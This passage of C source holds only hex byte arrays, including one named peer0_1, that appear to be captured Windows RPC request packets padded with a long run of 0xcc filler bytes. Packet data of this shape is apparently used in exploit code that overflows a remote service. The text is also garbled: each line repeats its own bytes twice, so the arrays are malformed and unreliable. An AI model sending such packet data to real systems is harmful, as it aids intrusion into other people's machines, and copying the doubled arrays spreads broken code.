(char)0xeb, (char)0x1c, (char)0xc9, (char)0x11, (char)0x9f, (char)0xe8, (char)0x08, (char)0x00, (char)0xeb, (char)0x1c, (char)0xc9, (char)0x11, (char)0x9f, (char)0xe8, (char)0x08, (char)0x00,
(char)0x2b, (char)0x10, (char)0x48, (char)0x60, (char)0x02, (char)0x00, (char)0x00, (char)0x00 }; (char)0x2b, (char)0x10, (char)0x48, (char)0x60, (char)0x02, (char)0x00, (char)0x00, (char)0x00 };
char peer0_1[1024] = { char peer0_1[1024] = {
(char)0x05, (char)0x00, (char)0x00, (char)0x83, (char)0x10, (char)0x00, (char)0x00, (char)0x00, (char)0x05, (char)0x00, (char)0x00, (char)0x83, (char)0x10, (char)0x00, (char)0x00, (char)0x00,
(char)0x2c, (char)0x05, (char)0x00, (char)0x00, (char)0x01, (char)0x00, (char)0x00, (char)0x00, (char)0x2c, (char)0x05, (char)0x00, (char)0x00, (char)0x01, (char)0x00, (char)0x00, (char)0x00,
(char)0x04, (char)0x05, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x07, (char)0x00, (char)0x04, (char)0x05, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x07, (char)0x00,
(char)0xe0, (char)0x0c, (char)0x6b, (char)0x90, (char)0x0b, (char)0xc7, (char)0x67, (char)0x10, (char)0xe0, (char)0x0c, (char)0x6b, (char)0x90, (char)0x0b, (char)0xc7, (char)0x67, (char)0x10,
(char)0xb3, (char)0x17, (char)0x00, (char)0xdd, (char)0x01, (char)0x06, (char)0x62, (char)0xda, (char)0xb3, (char)0x17, (char)0x00, (char)0xdd, (char)0x01, (char)0x06, (char)0x62, (char)0xda,
(char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00,
(char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00,
(char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00,
(char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x06, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x06, (char)0x00, (char)0x00, (char)0x00,
(char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x06, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x06, (char)0x00, (char)0x00, (char)0x00,
(char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00,
(char)0x31, (char)0x00, (char)0x00, (char)0x00, (char)0x07, (char)0x00, (char)0x00, (char)0x00, (char)0x31, (char)0x00, (char)0x00, (char)0x00, (char)0x07, (char)0x00, (char)0x00, (char)0x00,
(char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x07, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x07, (char)0x00, (char)0x00, (char)0x00,
(char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00,
(char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x31, (char)0x00, (char)0x31, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00,
(char)0x2b, (char)0x02, (char)0x33, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x2b, (char)0x02, (char)0x33, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00,
(char)0x2b, (char)0x02, (char)0x00, (char)0x00, (char)0xcc, (char)0xCC, (char)0xcc, (char)0xcc, (char)0x2b, (char)0x02, (char)0x00, (char)0x00, (char)0xcc, (char)0xCC, (char)0xcc, (char)0xcc,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
(char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00, (char)0xcc, (char)0x00,
